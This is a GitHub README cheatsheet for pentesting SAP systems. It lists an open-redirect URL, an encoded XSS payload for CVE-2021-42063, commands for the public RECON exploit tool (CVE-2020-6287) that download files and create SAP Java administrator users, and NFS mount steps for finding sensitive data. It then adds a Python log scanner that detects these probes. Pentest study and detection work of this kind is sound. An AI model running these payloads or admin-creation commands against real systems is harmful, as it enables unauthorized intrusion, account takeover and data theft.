pondoksiber/SAP-Pentest-Cheatsheet


SAP-Pentest-Cheatsheet

Bismillah

To conduct the pentest, you should deploy an SAP system on your own network.

SAP Web Interface Vulnerability

  1. Open Redirection Check

https://HOST/sap/public/bc/icf/logoff?redirecturl=MALICIOUSURL

  2. Unsecured Protocol (HTTP) Check

http://HOST:PORT/startPage

http://HOST:PORT/sap/public/info

  3. System Informational Misconfiguration Check

http://HOST:PORT/sap/public/info

  4. XSS (CVE-2021-42063)

Look for the /SAPIrExtHelp path, e.g. https://localhost/SAPIrExtHelp

https://HOST/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp

  5. SAP Information System 1.0 Shell Upload

  6. CVE-2022-22536 (ICMAD SAP)

  7. SAP RECON vulnerability (CVE-2020-6287, CVE-2020-6286)

https://github.com/chipik/SAP_RECON

Download zip file

python RECON.py -H 172.16.30.8 -f /1111.zip

Create SAP JAVA user

python RECON.py -H 172.16.30.8 -u

Create SAP JAVA Administrator user

python RECON.py -H 172.16.30.8 -a
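
On the defensive side, the open-redirect, /sap/public/info and SAPIrExtHelp checks above leave recognisable request targets in HTTP access logs. The following is an added example, not part of the original cheatsheet: the log format, the `TRUSTED_HOSTS` allow-list, the finding labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: hostnames the logoff handler may legitimately redirect to.
TRUSTED_HOSTS = {"sap.example.internal"}

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sap/public/bc/icf/logoff?redirecturl=https://evil.example/ HTTP/1.1" 302 0',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /sap/public/bc/icf/logoff?redirecturl=/sap/bc/gui HTTP/1.1" 302 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /sap/public/info HTTP/1.1" 200 512',
    '10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /SAPIrExtHelp/random/%22%3E%3Cx%3E.asp HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /SAPIrExtHelp/index.html HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return finding labels for one request target (path plus query)."""
    parts = urlsplit(target)
    path = unquote(parts.path)            # decode %22%3E%3C... before matching
    lowered = path.lower().rstrip("/")
    findings = []
    if lowered == "/sap/public/bc/icf/logoff":
        for key, value in parse_qsl(parts.query):
            host = urlsplit(value).hostname   # None for relative targets
            if key.lower() == "redirecturl" and host and host not in TRUSTED_HOSTS:
                findings.append("open-redirect")
    if lowered == "/sap/public/info":
        findings.append("info-endpoint-access")
    if lowered.startswith("/sapirexthelp/") and re.search(r'[<>"]', path):
        findings.append("markup-in-sapirexthelp-path")
    return findings

def scan(lines):
    """Return (client, label, target) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue                      # skip lines that are not HTTP requests
        client, target = match.groups()
        hits.extend((client, label, target) for label in classify(target))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Relative redirect targets and ordinary help pages are not flagged; scheme-relative values such as `//host` are, because `urlsplit` still resolves a hostname for them.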

SAP Network Vulnerability

  1. SSL Vulnerability Check

sslscan

  2. NFS Mount

nfs-ls nfs://HOST/mount

mkdir mnt && mount -t nfs HOST:/mount ./mnt

Good luck searching for sensitive information.

Contribution

I am looking for an SAP virtual machine or container for doing pentest simulation; if you have info, please kindly DM me @linkedin.

Sharing is Caring

As he (peace and blessings be upon him) said: "The best of people are those who are most beneficial to people."
